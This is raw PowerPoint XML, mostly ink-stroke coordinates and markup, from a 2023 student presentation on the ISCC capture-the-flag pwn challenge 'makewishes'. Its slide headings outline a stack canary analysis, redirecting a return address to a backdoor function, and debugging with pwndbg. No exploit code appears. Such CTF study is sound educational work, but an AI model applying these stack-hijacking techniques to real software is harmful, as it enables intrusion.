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1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凡豪 薛" initials="凡豪" lastIdx="1" clrIdx="0">
    <p:extLst>
      <p:ext uri="{19B8F6BF-5375-455C-9EA6-DF929625EA0E}">
        <p15:presenceInfo xmlns:p15="http://schemas.microsoft.com/office/powerpoint/2012/main" userId="e809b9535e76d6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2:56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24575,'19'0'0,"14"1"0,0-2 0,1-1 0,57-12 0,-52 8 0,1 1 0,0 2 0,0 1 0,49 6 0,2-2 0,1279-2 0,-1352 1 0,0 1 0,0 0 0,17 6 0,-15-3 0,-1-2 0,27 2 0,-24-3 0,42 9 0,-42-7 0,44 4 0,542-6 0,-294-4 0,-218 3 0,106-3 0,-180-2 42,0 0 1,39-13-1,-39 10-539,0 1-1,30-4 1,-32 8-6329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6:46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24575,'2516'0'0,"-2498"-1"43,0-1-1,36-8 1,-35 5-541,1 1 1,24-1-1,-23 5-6328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6:4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24575,'29'0'0,"0"-1"0,0-2 0,42-8 0,-51 7 0,1 2 0,23-1 0,-25 2 0,-1 0 0,0-1 0,23-6 0,-20 3 0,1 2 0,0 0 0,38 0 0,-2 1 0,11-10 0,-50 8 0,0 0 0,24 0 0,50 5 0,39-2 0,-65-11 0,-49 8 0,1 0 0,26-1 0,414 4 0,-220 3 0,-223-1 0,0 1 0,0 0 0,0 2 0,0 0 0,21 8 0,-20-6 0,0-1 0,0-1 0,1 0 0,20 2 0,-14-4 0,34 8 0,-36-5 0,0-1 0,26 1 0,114-7 0,74 4 0,-169 10 0,-48-8 0,-1-1 0,28 2 0,103-5-1365,-128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8:38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431 698 24575,'0'-15'0,"1"-36"0,-3 0 0,-13-82 0,4 79 0,3 21 0,2 0 0,1 0 0,-1-37 0,6 45 0,-2 0 0,0 1 0,-2-1 0,-1 1 0,-1 0 0,-14-37 0,18 44 0,12 22 0,13 21 0,9 28 0,-26-41 0,2 0 0,0 0 0,17 22 0,-8-15 0,-2 0 0,15 26 0,-8-2 0,-19-35 0,2 1 0,-1-1 0,1-1 0,1 1 0,11 14 0,-8-11 0,-1 1 0,0 0 0,0 0 0,-2 1 0,9 23 0,-7-17 0,5 11 0,-9-18 0,1-1 0,0 0 0,1 0 0,0-1 0,14 20 0,-13-22 0,-1 0 0,-1 1 0,1 0 0,-2 1 0,1-1 0,2 13 0,15 32 0,-8-21 0,-13-33 0,0 0 0,-1 1 0,0-1 0,1 1 0,-1-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,-1 1 0,0-1 0,-1 3 0,1-4 0,0 1 0,-1-1 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,1 0 0,-1-1 0,1 1 0,0 0 0,-1-1 0,1 1 0,0-1 0,0 0 0,-1 1 0,1-1 0,-2-2 0,-28-17 0,-28-24 0,29 23 0,-54-50 0,43 38 0,33 28 0,1-1 0,-1 0 0,1 0 0,0 0 0,-8-11 0,7 8 0,-1 0 0,0 0 0,0 1 0,-1 1 0,1-1 0,-2 2 0,1-1 0,-22-9 0,17 9 0,1 0 0,0-2 0,0 0 0,-15-13 0,18 14 0,1 1 0,-1-1 0,-1 2 0,-19-9 0,-5-3 0,-12-6 0,29 15 0,1 0 0,-26-18 0,44 27 0,-1 0 0,1 0 0,-1 0 0,1-1 0,0 1 0,-1 0 0,1 0 0,-1-1 0,1 1 0,0-1 0,-1 1 0,1 0 0,0-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,0-1 0,-1 1 0,1-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0-1 0,13-7 0,24 4 0,-37 4 0,10-1 0,7 1 0,0-1 0,0 0 0,1-1 0,-1-1 0,0-1 0,-1-1 0,29-11 0,-30 11 0,0 0 0,0 0 0,26-3 0,-22 4 0,0 0 0,19-7 0,-15 4 0,0 0 0,28-3 0,-30 6 0,-1 0 0,1-1 0,29-13 0,-1 0 0,0 2 0,1 2 0,76-11 0,-122 24 0,-3 0 0,0 1 0,0 0 0,0 0 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,0 1 0,0 0 0,-1-1 0,2 2 0,-1 0 0,0 0 0,-1-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,0 0 0,-1 0 0,1 2 0,-2 5 0,0-1 0,0 0 0,-1 0 0,0 0 0,-6 12 0,-54 70 0,36-54 0,-93 110 0,42-45 0,55-69 0,2 0 0,-29 60 0,46-84 0,-1 0 0,0 0 0,0 0 0,-1 0 0,-7 7 0,-22 30 0,21-21 0,6-12 0,1 1 0,-8 20 0,8-16-1365,-1-3-5461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8:3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9:42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824 2765 24575,'-106'2'0,"-113"-4"0,203-2 0,0 0 0,0-1 0,0 0 0,1-1 0,0-1 0,-15-9 0,5 4 0,10 5 0,-1 0 0,1-1 0,1-1 0,-1 0 0,2-1 0,-1-1 0,1 0 0,1-1 0,0 0 0,1 0 0,-14-21 0,17 20 0,0 0 0,2-1 0,0 0 0,0 0 0,1-1 0,-5-25 0,1 4 0,-16-40 0,16 54 0,1-2 0,1 1 0,1-1 0,-5-47 0,8 33 0,-3 1 0,-10-40 0,8 44 0,1 0 0,2-1 0,-1-37 0,8-528 0,-1 576 0,2 0 0,1-1 0,1 2 0,1-1 0,10-26 0,25-46 0,-14 34 0,-9 23 0,-11 27 0,-2-1 0,0 0 0,6-19 0,-7 18 0,1 0 0,0 0 0,1 1 0,12-20 0,-10 18 0,0 0 0,10-27 0,-11 25 0,1-1 0,18-30 0,2-2 0,15-20 0,-30 52 0,-2-1 0,12-23 0,-3-3 0,1 0 0,2 2 0,3 1 0,0 1 0,45-50 0,-64 82-195,0 0 0,-1-1 0,-1 1 0,1-1 0,-1 0 0,6-17 0,-6 10-6631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23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24575,'6'1'0,"0"-1"0,0 1 0,-1 0 0,1 1 0,0-1 0,0 1 0,-1 0 0,1 1 0,-1-1 0,0 1 0,1 0 0,-1 1 0,-1-1 0,9 8 0,-2-3 0,82 52 0,6-11 0,-88-44 0,1 0 0,-1-1 0,23 6 0,-21-7 0,1 1 0,22 10 0,-25-9 0,1-1 0,1 1 0,-1-2 0,1 0 0,-1 0 0,27 1 0,81-5 0,-53-1 0,-46 1 0,0-2 0,0 0 0,0-1 0,0-1 0,19-8 0,5-4 0,-24 8 0,40-11 0,10-3 0,-58 18 0,1-1 0,0 2 0,1 0 0,-1 1 0,21-2 0,-2 3 0,65 5 0,-86-1 0,-1 0 0,0 0 0,0 0 0,0 2 0,0-1 0,-1 2 0,1-1 0,-1 1 0,15 10 0,-14-8 0,1-1 0,0-1 0,0 0 0,0 0 0,1-1 0,-1-1 0,15 3 0,30 9 0,-32-8 0,1-1 0,0-1 0,0-1 0,30 1 0,109-6 0,-64-1 0,-76 1 0,-1-2 0,30-6 0,-27 4 0,42-2 0,-57 5 0,0 1 0,0-2 0,0 1 0,0-2 0,-1 0 0,13-5 0,-11 3 0,1 1 0,-1 1 0,28-5 0,-25 6 0,0 0 0,0-2 0,26-10 0,1 0 0,130-35 0,-142 44 0,0 2 0,0 1 0,0 1 0,57 5 0,-10 0 0,345-3 0,-403-1 0,0-2 0,0 0 0,20-6 0,10-1 0,-32 6 0,-1-1 0,30-12 0,21-6 0,-48 17 0,0 0 0,34-17 0,-41 16 0,1 0 0,0 2 0,0-1 0,0 2 0,1 0 0,29-4 0,90 10 0,-80 0 0,57-5 0,-30-17-1365,-63 17-5461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9:4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24575,'105'1'0,"114"-3"0,-210 0 0,-1 0 0,0 0 0,0 0 0,-1-1 0,1-1 0,12-6 0,29-12 0,-46 21 0,1 1 0,-1-1 0,1 0 0,-1 1 0,1 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,1 1 0,5 2 0,-6-2 0,-1 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,0 0 0,0 1 0,0-1 0,0 1 0,-1-1 0,1 1 0,-1 0 0,1 4 0,0 9 0,0-1 0,-3 28 0,1-26 0,2 2 34,0-1-1,1 1 0,6 22 0,-4-19-782,4 36 0,-8-37-6077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11:3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24575,'34'0'0,"0"1"0,0 1 0,48 10 0,43 14 0,-87-20 0,0-2 0,0-1 0,0-2 0,40-4 0,7 1 0,-84 2 0,30-1 0,0 2 0,0 1 0,59 11 0,-54-6 0,0-3 0,0-1 0,0-1 0,51-5 0,-4 1 0,291 2 0,-359-1 0,0-1 0,-1 0 0,22-6 0,34-5 0,-47 10 0,0 0 0,0-2 0,25-9 0,-28 8 0,1 0 0,-1 1 0,2 1 0,25-1 0,-20 5 0,0-2 0,0-1 0,27-6 0,-38 6 0,25-7 0,0 1 0,75-4 0,-98 11 0,-1 0 0,0-1 0,1-1 0,28-10 0,-28 8 0,0 0 0,0 2 0,36-5 0,28-3 0,-59 7 0,46-3 0,306 9 0,-354 0 0,0 1 0,39 10 0,-13-2 0,5 1 0,-32-6 0,-1-1 0,39 2 0,-10-6-1365,-26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11:41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24575,'499'0'0,"-480"1"0,0 1 0,33 7 0,-32-4 0,0-2 0,24 2 0,-17-4 0,-1 1 0,1 0 0,28 8 0,-16-3 0,1-2 0,0-2 0,0-2 0,48-4 0,4 0 0,580 3 0,-654-1 0,0-1 0,0 0 0,17-6 0,-15 4 0,-1 0 0,27-1 0,-18 4 0,1-1 0,49-10 0,-37 6 0,1 1 0,0 2 0,80 6 0,-30-1 0,629-2-1365,-700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3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24575,'14'1'0,"0"-1"0,0 2 0,0 0 0,-1 0 0,1 2 0,-1-1 0,0 2 0,20 8 0,-16-7 0,1-1 0,0-1 0,0-1 0,0-1 0,1 0 0,-1-1 0,0-1 0,24-3 0,5 1 0,-25 1 0,1-2 0,-1-1 0,-1 0 0,37-13 0,-48 13 0,0-1 0,0 0 0,17-12 0,-20 12 0,1 0 0,0 0 0,0 1 0,1 0 0,-1 0 0,15-3 0,0 1 0,10-2 0,0 2 0,0 1 0,44-1 0,1169 7 0,-1228 0 0,1 1 0,33 8 0,-32-6 0,1 0 0,22 1 0,516-4 0,-270-3 0,-193 0 0,106 5 0,-195-2 0,1 2 0,-1-1 0,1 1 0,-1 0 0,0 0 0,0 1 0,0 0 0,7 7 0,13 5 0,-18-11 0,1-1 0,1 0 0,-1-1 0,0 0 0,1 0 0,0-1 0,19 1 0,82-5 0,-51 0 0,27 0 0,122 5 0,-143 9 0,-48-8 0,0-1 0,26 2 0,281-4 0,-154-2 0,-154 2 0,0 1 0,0 0 0,17 6 0,-15-4 0,-1 0 0,27 1 0,480-3 0,-255-4 0,-249 2 0,10 0 0,0 0 0,-1-2 0,62-12 0,-58 8 0,2 1 0,-1 2 0,0 2 0,51 4 0,-5-1 0,690-2 0,-753-1 0,0-1 0,33-8 0,-32 6 0,0 0 0,24-1 0,230 6-1365,-253-1-5461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11:3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24575,'34'0'0,"0"1"0,0 1 0,48 10 0,43 14 0,-87-20 0,0-2 0,0-1 0,0-2 0,40-4 0,7 1 0,-84 2 0,30-1 0,0 2 0,0 1 0,59 11 0,-54-6 0,0-3 0,0-1 0,0-1 0,51-5 0,-4 1 0,291 2 0,-359-1 0,0-1 0,-1 0 0,22-6 0,34-5 0,-47 10 0,0 0 0,0-2 0,25-9 0,-28 8 0,1 0 0,-1 1 0,2 1 0,25-1 0,-20 5 0,0-2 0,0-1 0,27-6 0,-38 6 0,25-7 0,0 1 0,75-4 0,-98 11 0,-1 0 0,0-1 0,1-1 0,28-10 0,-28 8 0,0 0 0,0 2 0,36-5 0,28-3 0,-59 7 0,46-3 0,306 9 0,-354 0 0,0 1 0,39 10 0,-13-2 0,5 1 0,-32-6 0,-1-1 0,39 2 0,-10-6-1365,-26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11:41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24575,'499'0'0,"-480"1"0,0 1 0,33 7 0,-32-4 0,0-2 0,24 2 0,-17-4 0,-1 1 0,1 0 0,28 8 0,-16-3 0,1-2 0,0-2 0,0-2 0,48-4 0,4 0 0,580 3 0,-654-1 0,0-1 0,0 0 0,17-6 0,-15 4 0,-1 0 0,27-1 0,-18 4 0,1-1 0,49-10 0,-37 6 0,1 1 0,0 2 0,80 6 0,-30-1 0,629-2-1365,-700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2:3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24575,'0'375'0,"-1"-357"0,-1 0 0,-1-1 0,-4 19 0,2-17 0,2 0 0,-3 27 0,8-2 0,-1-34 0,0 0 0,0 1 0,-2-1 0,1 0 0,-1 0 0,0 1 0,-5 12 0,6-22 1,0-1 0,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0-1,0 0 1,0 0 0,0 1 0,0-1 0,0 0 0,0 0 0,0 0 0,0 0 0,0 1 0,-1-1-1,1 0 1,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,0 0 0,0 0 0,0 0-1,0 0 1,-1 0 0,1 0 0,0 0 0,0 1 0,0-1 0,-1 0 0,1 0 0,0 0 0,0 0-1,-1 0 1,1 0 0,0 0 0,0 0 0,0-1 0,-1 1 0,1 0 0,0 0 0,0 0 0,0 0-1,0 0 1,-1 0 0,1 0 0,0 0 0,0 0 0,0 0 0,0-1 0,-1 1 0,1 0 0,0 0-1,0 0 1,0 0 0,0-1 0,0 1 0,0 0 0,-1 0 0,1 0 0,0 0 0,0-1 0,0 1-1,-5-14-1427,2-2-5399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2:3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502 205 24575,'-89'-1'0,"-97"3"0,178-1 0,1 0 0,0 1 0,0 0 0,0 0 0,0 1 0,1-1 0,-1 1 0,1 1 0,-1 0 0,1-1 0,0 2 0,1-1 0,-1 1 0,-7 8 0,5-5 0,1 1 0,0 1 0,0-1 0,1 1 0,1 0 0,-1 1 0,1-1 0,-4 18 0,-3 30 0,11-47 0,-1 1 0,-1 0 0,1-1 0,-2 1 0,-5 13 0,3-13 0,1 1 0,1 1 0,0-1 0,1 1 0,0-1 0,-1 28 0,5 87 0,2-52 0,-5 31 0,5 109 0,-2-205 0,0 1 0,1-1 0,1 0 0,0 0 0,1 0 0,0 0 0,0 0 0,1-1 0,1 1 0,0-1 0,0-1 0,1 1 0,7 8 0,-8-11 0,0 1 0,0 0 0,-1 0 0,7 16 0,13 20 0,0-13 0,54 51 0,-55-59 0,-18-18 0,1 0 0,0 0 0,0-1 0,0 0 0,0 0 0,13 4 0,-11-4 0,0 0 0,-1 0 0,0 0 0,15 11 0,-10-5 0,0 0 0,1-2 0,0 1 0,0-2 0,1 0 0,0-1 0,0 0 0,1-1 0,-1-1 0,26 4 0,11-3 0,101-1 0,-118-4 0,-22 0 0,-1 0 0,1-1 0,0 0 0,-1 0 0,1-2 0,-1 1 0,1-2 0,-1 0 0,0 0 0,-1-1 0,1 0 0,-1-1 0,0-1 0,0 0 0,13-11 0,31-27 0,-16 8 0,-30 29 0,-1 1 0,0-1 0,0-1 0,7-9 0,10-20 0,-9 14 0,0 0 0,21-21 0,-31 37 0,-1 0 0,0 0 0,-1-1 0,0 1 0,0-1 0,-1 0 0,0 0 0,0 0 0,-1 0 0,2-11 0,11-39 0,-8 37 0,-1-1 0,-1 1 0,3-26 0,4-24 0,-2 23 0,-6 27 0,0 1 0,12-32 0,-9 33 0,-1 0 0,-1 0 0,-1-1 0,-1 1 0,1-25 0,-6-109 0,0 60 0,3 22 0,-3-79 0,0 133 0,-1 0 0,-1 0 0,-1 1 0,-1 0 0,0 0 0,-1 0 0,-1 1 0,0 0 0,-2 0 0,1 1 0,-22-25 0,27 37 0,0 0 0,0 0 0,0 0 0,0 1 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,0 1 0,1 0 0,-1 0 0,0 0 0,-7 0 0,-12 0 0,-41 4 0,28-1 0,-79-3 0,-67 4 0,152 2 0,1 1 0,0 2 0,1 0 0,-50 23 0,62-23 0,-1 0 0,1 2 0,0 0 0,1 1 0,0 0 0,-15 16 0,22-20 0,-1 0 0,1-1 0,-1 0 0,0 0 0,-16 5 0,-12 8 0,-113 49 0,137-60 0,-1 0 0,1 0 0,-23 19 0,-8 1 27,39-26-127,1 1 1,0-1-1,-1 1 1,1 0 0,1 1-1,-1-1 1,0 1-1,1 0 1,0 0 0,0 0-1,0 1 1,0-1-1,-3 7 1,0 4-6727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7:59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E1C8D-CA78-837B-90F2-7F3847121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631767-94EE-1422-2881-515BA876B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BEFC7-D173-9474-8F6E-5980E1A7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B1DC-F6A7-4515-8016-86E71A307FF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ABEA7-8493-F603-0A61-9814FE8F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2C25E-B239-D88F-FC77-DFABBADF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F34-6945-4F11-BD12-6A3EFA464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7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91822-CE86-F3B6-71EA-2F472268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B6E40-B8DC-1AE9-A868-EB7079F36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9A645-90A3-C10B-148B-506B3237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B1DC-F6A7-4515-8016-86E71A307FF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5B44-A877-1699-CD12-02001E20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8E4D7-FF8D-AE26-2B33-1FD79E58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F34-6945-4F11-BD12-6A3EFA464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C33361-9712-B5FD-BC16-8DE78DB42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1465F-2269-3F11-0E7A-037D0A2A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8ADEB-F5B8-BD65-F0AC-59AA0F28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B1DC-F6A7-4515-8016-86E71A307FF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BECAF-90C3-9085-59DE-56BF26D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7C6B7-E9C2-216A-7DE7-34F41699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F34-6945-4F11-BD12-6A3EFA464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1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EAAF9-4C0D-C996-15A9-9EEED451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604C3-22A3-3CBE-32A8-EECEFC5A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D9DCD-D888-167E-04F7-6250F2A4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B1DC-F6A7-4515-8016-86E71A307FF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B26A5-3173-A076-7D37-BB6E739F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33F92-C918-DE7F-D29B-2B3F6C3B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F34-6945-4F11-BD12-6A3EFA464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F7F80-3424-8EA2-D71A-9447543B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5DA13-616C-F08D-F8E4-681CDC32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23371-3BA5-A209-ED47-3EE61824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B1DC-F6A7-4515-8016-86E71A307FF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F7C8C-1CAD-741D-F252-9E58224C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8B81A-DFAC-27F6-5B90-0BE8CC35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F34-6945-4F11-BD12-6A3EFA464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8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8EBF-6D09-960E-CEAB-B4308B5E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F4CB2-B860-4AB5-F9EC-30C74C70C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86295-55BF-12D2-A156-3AF7A10B8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5045BF-6148-F3D0-A47A-9A915557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B1DC-F6A7-4515-8016-86E71A307FF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7590D-E756-A570-82B9-A1FD2B89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14BD9-E0F2-75AC-8E4B-7EC313C7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F34-6945-4F11-BD12-6A3EFA464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2C71F-DA1F-A81D-3B09-F1B9F71E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47FE4-83B1-FF6C-FB34-FF4E926CD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4C646-9EE6-0DF7-574F-079068209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BB7B66-4629-2970-D159-0CDD21B2B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DBBD42-53F3-46B8-F863-6B388A8D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DA631D-31C2-19BD-F9FB-4DC4A78D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B1DC-F6A7-4515-8016-86E71A307FF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476304-0B36-A3A9-5E9F-CFC993B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3CDFC-233B-2455-F051-3D8E5158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F34-6945-4F11-BD12-6A3EFA464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7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25447-6919-AEFD-8595-0547837B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7BE518-D111-76BB-D12A-385D71DC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B1DC-F6A7-4515-8016-86E71A307FF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46646-3814-E93A-330C-9D22667B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687670-A849-7E93-DD44-2356FFEC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F34-6945-4F11-BD12-6A3EFA464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1EC1D1-AB2A-AA2C-A6FB-A26AEACD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B1DC-F6A7-4515-8016-86E71A307FF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F73498-0E9C-86A3-9027-5CE21586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B8062F-A756-4284-BA4C-1168DB45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F34-6945-4F11-BD12-6A3EFA464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4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F7E23-645E-AC16-4EB4-896E05E3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0DE07-0C12-8AFA-9D61-8A4AA9340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02599C-5250-FFAB-5C29-1C30C1618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0AF758-2A23-726B-998A-BA81BB91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B1DC-F6A7-4515-8016-86E71A307FF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BE572-F1F9-F909-BA73-E2B90022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B357B-7727-E883-5705-C660662F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F34-6945-4F11-BD12-6A3EFA464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6CA74-3E1D-C825-EF21-E9CB5B56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C55DF2-F8D4-429B-E328-C22954DEC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86231-ADAA-A3A8-6508-B222F6E21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55CCD-BD6D-8DB7-BB16-1139E4F9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B1DC-F6A7-4515-8016-86E71A307FF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3FB04-D66F-B950-A113-F2FE7FDD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65A36-0DE4-3F67-B97D-C9D6A1CF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F34-6945-4F11-BD12-6A3EFA464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5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0E01C1-89B2-687A-2090-F968BF7E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BDBCC-4CC9-EB1E-7AE5-71E3F38BC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EC284-AEC3-5E63-A8B9-184189C40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B1DC-F6A7-4515-8016-86E71A307FF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A33F4-DD25-2801-7966-502D9E359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479CE-3685-F96D-BED2-093D6B908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7F34-6945-4F11-BD12-6A3EFA464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24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8.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink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10.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink31.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image25.webp"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink30.xml"/><Relationship Id="rId9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36.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink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39.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink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42.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink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45.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink4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48.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink47.xml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51.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink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54.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink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57.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink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60.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink5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63.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink6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6.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink6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9.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink6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72.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink7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75.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink7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customXml" Target="../ink/ink7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6.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image13.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink5.xml"/><Relationship Id="rId9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5.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image10.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink12.xml"/><Relationship Id="rId12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6.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink10.xml"/><Relationship Id="rId9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customXml" Target="../ink/ink19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8.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image19.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink17.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink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customXml" Target="../ink/ink24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3.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image22.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink22.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink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5633-9885-0DB9-90ED-91A0B187B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3" y="91421"/>
            <a:ext cx="9144000" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>ISCC-pwn1(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>makewishes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969905-CB96-F477-1272-04D8B33B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7153" y="5110817"/>
            <a:ext cx="9144000" cy="1655762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>汇报人：薛凡豪、袁锦峰</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2023/5/24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22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（一）题目初探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9BA0C976-F7EA-09D6-8B64-C945A673F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8" y="1066128"/>
            <a:ext cx="9843247" cy="57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1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（一）题目初探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70ABE0-0A21-DF8D-1D38-26D19630C6D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="591671" y="1171976"/>
            <a:ext cx="831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浅析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>canary</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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BB6A6A92-C0DA-0D70-2FE6-29B1247169EA}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="5764341" y="2644264"/>
              <a:ext cx="1217880" cy="745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BB6A6A92-C0DA-0D70-2FE6-29B1247169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5344" y="2635264"/>
                <a:ext cx="1235515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5985AFA-3F4C-94BF-B839-ECF81F01FC5C}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4043181" y="5009464"/>
              <a:ext cx="1155600" cy="223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5985AFA-3F4C-94BF-B839-ECF81F01FC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4181" y="5000464"/>
                <a:ext cx="1173240" cy="399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4433CDE-D1C0-827E-133A-3BC3A7A969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70" y="1069789"/>
            <a:ext cx="6386605" cy="55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4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（一）题目初探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70ABE0-0A21-DF8D-1D38-26D19630C6D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="591671" y="1171976"/>
            <a:ext cx="831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5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>返回地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>后门函数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D990B847-22C8-B11D-389B-1676C3A53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008" y="2055295"/>
            <a:ext cx="10761984" cy="24866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A7001E-56C4-775B-66D1-010AA54C6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2749" y="4629025"/>
            <a:ext cx="4769215" cy="11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8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（二）动态调试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pwndbg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683EE8F2-3BA3-590B-C279-9CD748003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78" y="1869649"/>
            <a:ext cx="8947897" cy="311870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62F4FE4-8967-863E-F951-1172E147032F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1308847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过程和分析</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="372947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（二）动态调试</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pwndbg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F9BA043-E771-DCE7-E4F3-A8CC1EFDC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05" y="1546154"/>
            <a:ext cx="8926606" cy="41690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EA0940-8B3B-5858-0DF8-F1FF22A2C6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780"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6013437" y="1855208"/>
            <a:ext cx="7833835" cy="39203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6C94E9-2542-3317-AE2F-DE33108D7822}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
